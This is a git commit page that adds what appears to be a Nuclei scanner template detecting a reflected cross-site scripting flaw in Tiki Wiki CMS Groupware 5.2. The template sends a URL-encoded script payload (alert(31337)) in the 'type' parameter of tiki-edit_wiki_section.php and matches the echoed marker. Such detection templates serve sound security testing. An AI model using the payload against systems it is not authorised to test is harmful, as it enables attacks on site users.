Create tikiwiki-reflected-xss.yam
parent
0a38e306a7
commit
a46612e7b7
|
@ -0,0 +1,21 @@
|
|||
id: tikiwiki-reflected-xss
|
||||
|
||||
info:
|
||||
name: Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"
|
||||
- "{{BaseURL}}/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "31337"
|
||||
part: body
|
Loading…
Reference in New Issue